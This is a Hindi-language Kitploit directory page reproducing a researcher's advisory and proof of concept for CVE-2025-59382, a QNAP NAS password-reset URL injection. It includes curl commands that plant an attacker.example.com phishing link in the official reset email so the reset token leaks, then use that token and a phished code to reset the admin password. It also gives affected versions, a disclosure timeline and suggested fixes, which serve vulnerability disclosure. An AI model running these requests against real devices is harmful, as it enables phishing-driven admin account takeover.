Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59382-QNAP-Password-Reset-Account-Takeover — प्रूफ-ऑफ-कॉन्सेप्ट और CVE-2025-59382 के लिए तकनीकी व्याख्या, QNAP NAS में एक अप्रमाणित पासवर्ड रीसेट URL इंजेक्शन जो एक फिशिंग-टू-अकाउंट-टेकओवर श्रृंखला को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफिशिंगपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

प्रूफ-ऑफ-कॉन्सेप्ट और CVE-2025-59382 के लिए तकनीकी व्याख्या, QNAP NAS में एक अप्रमाणित पासवर्ड रीसेट URL इंजेक्शन जो एक फिशिंग-टू-अकाउंट-टेकओवर श्रृंखला को सक्षम बनाता है।

रिपॉजिटरी देखें
1112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59382: QNAP पासवर्ड रीसेट से खाता अधिग्रहण

अप्रमाणित हमलावर-नियंत्रित पासवर्ड रीसेट URL /cgi-bin/reset_password.cgi में है।

प्रयोगशाला में QuTScloud c5.2.4.3041 build 20250211 के विरुद्ध परीक्षण किया गया। QNAP ने बाद में इसे सलाह QSA-26-10 में CVE-2025-59382 के रूप में प्रकाशित किया।

संक्षिप्त संस्करण

एक अप्रमाणित हमलावर स्थानीय नेटवर्क पहुंच, या एक उजागर NAS प्रबंधन इंटरफ़ेस तक पहुंच के साथ, /cgi-bin/reset_password.cgi में send_mail फ़ंक्शन के url पैरामीटर में हेरफेर करके आधिकारिक QNAP पासवर्ड रीसेट ईमेल में एक मनमाना URL सम्मिलित कर सकता है।

पीड़ित को NAS से एक वास्तविक QNAP पासवर्ड रीसेट ईमेल प्राप्त होता है। हमलावर का URL सीधे HTML ईमेल बॉडी में एम्बेड किया जाता है, और QNAP उस URL में रीसेट टोकन () जोड़ देता है।

rp

यह पासवर्ड रीसेट ईमेल को एक साफ-सुथरी फिशिंग-से-खाता-अधिग्रहण श्रृंखला में बदल देता है:

  1. हमलावर अपने स्वयं के URL के साथ पासवर्ड रीसेट ट्रिगर करता है
  2. NAS पीड़ित को वास्तविक QNAP रीसेट ईमेल भेजता है
  3. पीड़ित हमलावर के URL पर क्लिक करता है
  4. हमलावर को rp रीसेट टोकन प्राप्त होता है
  5. पीड़ित फिशिंग पेज पर सत्यापन कोड (vc) दर्ज करता है
  6. हमलावर व्यवस्थापक पासवर्ड रीसेट करता है और लॉग इन करता है

पीड़ित की बातचीत की आवश्यकता है, लेकिन हमलावर प्रमाणीकरण की नहीं।

ट्रिगर

root@kitploit:~
curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"

NAS आधिकारिक रीसेट ईमेल भेजता है और रीसेट टोकन को हमलावर URL में जोड़ता है, उदाहरण के लिए:

root@kitploit:~
https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44

सत्यापन कोड भी उसी ईमेल में दिखाया जाता है। प्रयोगशाला साक्ष्य में यह इस प्रकार दिखता था:

root@kitploit:~
Your verification code is: 2FEA2B8B

इसलिए फिशिंग पेज को केवल पीड़ित से सत्यापन कोड माँगना होता है। लिंक क्लिक करने पर rp टोकन पहले से ही हमलावर के सर्वर पर पहुँच जाता है।

पासवर्ड रीसेट

एक बार हमलावर के पास rp टोकन और संबंधित vc सत्यापन कोड आ जाए, तो वे व्यवस्थापक पासवर्ड रीसेट कर सकते हैं:

root@kitploit:~
curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
  "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"

अंतिम रीसेट कॉल POST होना चाहिए। पीड़ित नकली पेज पर जो सत्यापन कोड दर्ज करता है, वह QNAP को vc=<code> के रूप में भेजा जाता है।

नया पासवर्ड new_pw में base64 एन्कोडेड है। PoC में यह व्यवस्थापक पासवर्ड बदलने और फिर व्यवस्थापक के रूप में लॉग इन करने के लिए पर्याप्त था।

यह कैसे काम करता है

सामान्य फ्रंटएंड प्रवाह एक स्थानीय NAS URL इस प्रकार बनाता है:

root@kitploit:~
location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"

लेकिन बैकएंड स्वयं रीसेट URL उत्पन्न करने के बजाय क्लाइंट-आपूर्ति किए गए url पैरामीटर पर भरोसा करता है। फिर यह उस मान का उपयोग करके ईमेल लिंक बनाता है और जोड़ता है:

root@kitploit:~
&u=<user>&rp=<reset_token>

यह बस जो कुछ भी url के रूप में पास किया जाता है, उस पर भरोसा करता है।

प्रभाव

  • अप्रमाणित रीसेट ईमेल ट्रिगर
  • आधिकारिक QNAP ईमेल में हमलावर-नियंत्रित URL होता है
  • पीड़ित के क्लिक करने पर रीसेट टोकन हमलावर को लीक हो जाता है
  • सत्यापन कोड उसी ईमेल प्रवाह से फिश किया जा सकता है
  • प्रयोगशाला श्रृंखला ने व्यवस्थापक पासवर्ड रीसेट और व्यवस्थापक लॉगिन साबित किया

भरोसेमंद NAS ईमेल वितरण कर रहा है।

सार्वजनिक स्थिति

  • CVE: CVE-2025-59382
  • Advisory: QSA-26-10
  • QNAP सलाह रिलीज़ तिथि: 2026-06-17
  • विक्रेता CWE: CWE-472
  • विक्रेता CVSS v4.0: 5.1 मध्यम
  • QNAP स्थिति: हल

QNAP प्रभावित उत्पादों को इस प्रकार सूचीबद्ध करता है:

  • QTS 5.2.7
  • QuTS hero h5.2.8
  • QuTS cloud c5.2.8
  • QVP 2.7.1

QNAP द्वारा सूचीबद्ध निर्धारित संस्करण:

  • QTS 5.2.9.3499
  • QuTS hero h5.2.9
  • QuTS cloud C5.2.9
  • QVP 2.8.0

QNAP ने इस मुद्दे को एक दूरस्थ हमलावर के रूप में वर्णित किया जो पासवर्ड रीसेट URL को संशोधित करता है और पीड़ित को हमलावर-नियंत्रित रीसेट पेज पर जाने के लिए धोखा देता है, जिससे क्रेडेंशियल चोरी होती है।

मेरा अपना प्रयोगशाला लक्ष्य QuTScloud c5.2.4.3041 build 20250211 था। मेरे प्रयोगशाला प्रभाव में पीड़ित की बातचीत के बाद व्यवस्थापक पासवर्ड रीसेट और व्यवस्थापक लॉगिन शामिल था।

छोटा नोट: मैंने इसे अपनी प्रयोगशाला में 2026-05-09 पर पुन: प्रस्तुत किया और 2026-05-11 पर QNAP को भेजा; उन्होंने इसे INTSI000-9029 का डुप्लिकेट चिह्नित किया। चूंकि QNAP ने अब CVE/सलाह प्रकाशित कर दिया है, मैं POC प्रकाशित कर रहा हूँ। पहले खोजने का श्रेय टिम कोएन को।

मैं क्या ठीक करूँगा

मुझे नहीं पता कि QNAP ने कौन सा सटीक पैच इस्तेमाल किया। उनकी सलाह में केवल निर्धारित संस्करण सूचीबद्ध हैं।

सही फिक्स के लिए मेरा अनुमान सरल है: ब्राउज़र को NAS को यह न बताने दें कि रीसेट लिंक कहाँ इंगित करना चाहिए।

NAS को स्वयं वह लिंक बनाना चाहिए। यदि QNAP को अभी भी प्रवाह के लिए url पैरामीटर की आवश्यकता है, तो इसे केवल सामान्य NAS रीसेट पेज स्वीकार करना चाहिए और किसी भी बाहरी चीज़ को अस्वीकार करना चाहिए।

मैं ईमेल बॉडी में डाले जाने वाली किसी भी चीज़ को एनकोड करूँगा, और अप्रमाणित रीसेट ईमेल अनुरोधों के आसपास कुछ दर सीमा लगाऊँगा।

संदर्भ

  • QNAP सलाह: https://www.qnap.com/en/security-advisory/qsa-26-10
  • QNAP CVE JSON: https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59382
  • CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2025-59382

अस्वीकरण: यह शोषण कोड शैक्षिक और रक्षात्मक अनुसंधान उद्देश्यों के लिए प्रकाशित किया गया है। इसका उपयोग उन प्रणालियों के विरुद्ध न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण नहीं है। लेखक दुरुपयोग के लिए जिम्मेदार नहीं है।

Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · nadsec.online

टूल डाउनलोड करें